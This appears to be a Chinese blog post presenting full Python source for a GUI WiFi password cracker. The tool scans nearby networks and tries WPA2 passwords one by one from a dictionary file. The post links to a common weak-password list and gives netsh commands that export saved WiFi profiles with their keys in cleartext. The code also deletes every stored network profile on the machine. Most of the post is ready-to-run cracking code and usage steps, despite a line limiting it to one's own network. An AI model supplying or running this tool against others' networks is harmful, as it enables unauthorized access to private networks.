最近更新于 2024-05-05 12:32
前言
- 不可在未经允许的情况下爆破他人的 WiFi,可用自己的 WiFi 测试。
- 本方案提供的代码在 WiFi 名含有中文时不可用,代码来源于:https://github.com/Leno1993/python-wifi 项目,此处给出的代码对原项目的代码进行了一些小改动,主要是 ① WiFi 列表将能够按照信号由强到弱排列;② 重复点击扫描 WiFi 时,列表不会保留之前扫描的结果了;③ WiFi 名含有中文的也可以在列表中正常显示了;④ 针对执行爆破前,读取字典文件内容处增加异常处理,在忘记选择字典文件或文件无法读取时可以快速发现……但是由于个人能力的问题,我折腾了一番也没解决无法连接中文 WiFi 的问题(即使密码正确也判断为错误)。
- 原理是通过自行选定的密码字典进行挨个测试连接,提供的代码将尝试连接的过程自动化,如果提供的字典含有 WiFi 密码,那么最终可以成功。这个方案比较依赖使用的字典,此处提供从网络上搜集的常见弱密码字典:https://github.com/IYATT-yx/WiFi-Password-Dictionary ,但是如果面临复杂的密码,那基本就概率渺茫了。而且该方案是一个一个尝试连接,因此速度很慢的,也不适用于多线程执行,如果要多线程并发那也得有多张无线网卡,一般家用电脑也不会刻意额外搞那么多无线网卡,此处的代码也没有提供多线程实现。
- 使用该代码注意备份,如果无所谓电脑上已经连接过的 WiFi 密码就可以不管。该代码在运行中为了避免自动连接其它已有密码的 WiFi 导致中断,会删除电脑中的 WiFi 连接配置文件。
下面命令需要以管理员权限打开 PowerShell 或者 CMD,执行
备份(一个 WiFi 一个文件)
netsh wlan export profile folder=【配置文件保存目录】 key=clear
其中选中字段就是该 WiFi 的密码
恢复备份
netsh wlan add profile filename=【路径\文件名.xml】- 更高效的爆破方案参考:https://blog.iyatt.com/?p=10677
- 我的测试环境:
Windows 11 专业工作站版 22H2 版本 22621.1992
Python 3.11.4 {
tkinter(官方 GUI 库,Windows 版 Python 安装时默认勾选 tk/tcl 支持就有)
comtypes 1.2.0
pywifi 1.1.12
}
代码
from tkinter import *
from tkinter import ttk
import pywifi
from pywifi import const
import time
import tkinter.filedialog
import tkinter.messagebox
class MY_GUI():
def __init__(self,init_window_name):
self.init_window_name = init_window_name
#密码文件路径
self.get_value = StringVar()
#获取破解wifi账号
self.get_wifi_value = StringVar()
#获取wifi密码
self.get_wifimm_value = StringVar()
self.wifi = pywifi.PyWiFi() #抓取网卡接口
self.iface = self.wifi.interfaces()[0] #抓取第一个无线网卡
self.iface.disconnect() #测试链接断开所有链接
time.sleep(1) #休眠1秒
#测试网卡是否属于断开状态
assert self.iface.status() in [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
def __str__(self):
return '(WIFI:%s,%s)' % (self.wifi,self.iface.name())
#设置窗口
def set_init_window(self):
self.init_window_name.title("WIFI破解工具")
self.init_window_name.geometry('+500+200')
labelframe = LabelFrame(width=400, height=200,text="配置")
labelframe.grid(column=0, row=0, padx=10, pady=10)
self.search = Button(labelframe,text="搜索附近WiFi",command=self.scans_wifi_list).grid(column=0,row=0)
self.pojie = Button(labelframe,text="开始破解",command=self.readPassWord).grid(column=1,row=0)
self.label = Label(labelframe,text="目录路径:").grid(column=0,row=1)
self.path = Entry(labelframe,width=12,textvariable = self.get_value).grid(column=1,row=1)
self.file = Button(labelframe,text="添加密码文件目录",command=self.add_mm_file).grid(column=2,row=1)
self.wifi_text = Label(labelframe,text="WiFi账号:").grid(column=0,row=2)
self.wifi_input = Entry(labelframe,width=12,textvariable = self.get_wifi_value).grid(column=1,row=2)
self.wifi_mm_text = Label(labelframe,text="WiFi密码:").grid(column=2,row=2)
self.wifi_mm_input = Entry(labelframe,width=10,textvariable = self.get_wifimm_value).grid(column=3,row=2,sticky=W)
self.wifi_labelframe = LabelFrame(text="wifi列表")
self.wifi_labelframe.grid(column=0, row=3,columnspan=4,sticky=NSEW)
# 定义树形结构与滚动条
self.wifi_tree = ttk.Treeview(self.wifi_labelframe,show="headings",columns=("a", "b", "c", "d"))
self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)
self.wifi_tree.configure(yscrollcommand=self.vbar.set)
# 表格的标题
self.wifi_tree.column("a", width=50, anchor="center")
self.wifi_tree.column("b", width=100, anchor="center")
self.wifi_tree.column("c", width=100, anchor="center")
self.wifi_tree.column("d", width=100, anchor="center")
self.wifi_tree.heading("a", text="WiFiID")
self.wifi_tree.heading("b", text="SSID")
self.wifi_tree.heading("c", text="BSSID")
self.wifi_tree.heading("d", text="signal")
self.wifi_tree.grid(row=4,column=0,sticky=NSEW)
self.wifi_tree.bind("<Double-1>",self.onDBClick)
self.vbar.grid(row=4,column=1,sticky=NS)
#搜索wifi
def scans_wifi_list(self): # 扫描周围wifi列表
#开始扫描
print("^_^ 开始扫描附近wifi...")
self.iface.scan()
time.sleep(1)
#在若干秒后获取扫描结果
scanres = self.iface.scan_results()
#统计附近被发现的热点数量
nums = len(scanres)
print("数量: %s"%(nums))
#print ("| %s | %s | %s | %s"%("WIFIID","SSID","BSSID","signal"))
# 实际数据
scanres.sort(key=lambda x : x.signal, reverse=True) # 修订注:将 WiFi 按信号强度从大到小排序
self.show_scans_wifi_list(scanres)
return scanres
#显示wifi列表
def show_scans_wifi_list(self,scans_res):
self.wifi_tree.delete(*self.wifi_tree.get_children()) # 清空列表
for index,wifi_info in enumerate(scans_res):
# print("%-*s| %s | %*s |%*s\n"%(20,index,wifi_info.ssid,wifi_info.bssid,,wifi_info.signal))
self.wifi_tree.insert("",'end',values=(index + 1,
wifi_info.ssid.encode('raw_unicode_escape', 'strict').decode('utf-8'), # 修订注:按 UTF-8 解码后在 Windows 下中文 WiFi 名才能正常显示
wifi_info.bssid,wifi_info.signal))
#print("| %s | %s | %s | %s \n"%(index,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))
#添加密码文件目录
def add_mm_file(self):
self.filename = tkinter.filedialog.askopenfilename()
self.get_value.set(self.filename)
#Treeview绑定事件
def onDBClick(self,event):
self.sels= event.widget.selection()
self.get_wifi_value.set(self.wifi_tree.item(self.sels,"values")[1])
#print("you clicked on",self.wifi_tree.item(self.sels,"values")[1])
#读取密码字典,进行匹配
def readPassWord(self):
self.getFilePath = self.get_value.get()
#print("文件路径:%s\n" %(self.getFilePath))
self.get_wifissid = self.get_wifi_value.get()
#print("ssid:%s\n" %(self.get_wifissid))
try: # 修订注:捕获打开异常
self.pwdfilehander=open(self.getFilePath,"r",errors="ignore")
except Exception as e:
print('无法打开字典文件:', e)
return
count = 1 # 修订注:尝试计数
while True:
try:
self.pwdStr =self.pwdfilehander.readline()
#print("密码: %s " %(self.pwdStr))
if not self.pwdStr:
break
self.bool1=self.connect(self.pwdStr,
self.get_wifissid)
#print("返回值:%s\n" %(self.bool1) )
if self.bool1:
# print("密码正确:"+pwdStr
# res = "密码:%s 正确 \n"%self.pwdStr;
self.res = "%i ===正确=== wifi名:%s 匹配密码:%s "%(count, self.get_wifissid,self.pwdStr)
self.get_wifimm_value.set(self.pwdStr)
tkinter.messagebox.showinfo('提示', '破解成功!!!')
print(self.res)
break
else:
# print("密码:"+self.pwdStr+"错误")
self.res = "%i ---错误--- wifi名:%s 匹配密码:%s"%(count, self.get_wifissid,self.pwdStr)
count += 1
print(self.res)
# sleep(1)
except Exception as e:
print('尝试连接出现异常:', e)
#对wifi和密码进行匹配
def connect(self,pwd_Str,wifi_ssid):
#创建wifi链接文件
self.profile = pywifi.Profile()
self.profile.ssid =wifi_ssid #wifi名称
self.profile.auth = const.AUTH_ALG_OPEN #网卡的开放
self.profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法
self.profile.cipher = const.CIPHER_TYPE_CCMP #加密单元
self.profile.key = pwd_Str #密码
self.iface.remove_all_network_profiles() #删除所有的wifi文件
self.tmp_profile = self.iface.add_network_profile(self.profile)#设定新的链接文件
self.iface.connect(self.tmp_profile)#链接
time.sleep(5)
if self.iface.status() == const.IFACE_CONNECTED: #判断是否连接上
isOK=True
else:
isOK=False
self.iface.disconnect() #断开
# time.sleep(1)
#检查断开状态
assert self.iface.status() in\
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
return isOK
def gui_start():
init_window = Tk()
ui = MY_GUI(init_window)
print(ui)
ui.set_init_window()
#ui.scans_wifi_list()
init_window.mainloop()
gui_start()效果演示
演示我就用的手机开的 WiFi 热点,然后密码字典自己创建的一个,里面有一个是正确密码
运行代码
搜索 WiFi,并双击选中要爆破的 WiFi
然后添加密码字典路径,点击开始爆破
WiFi 密码爆破连接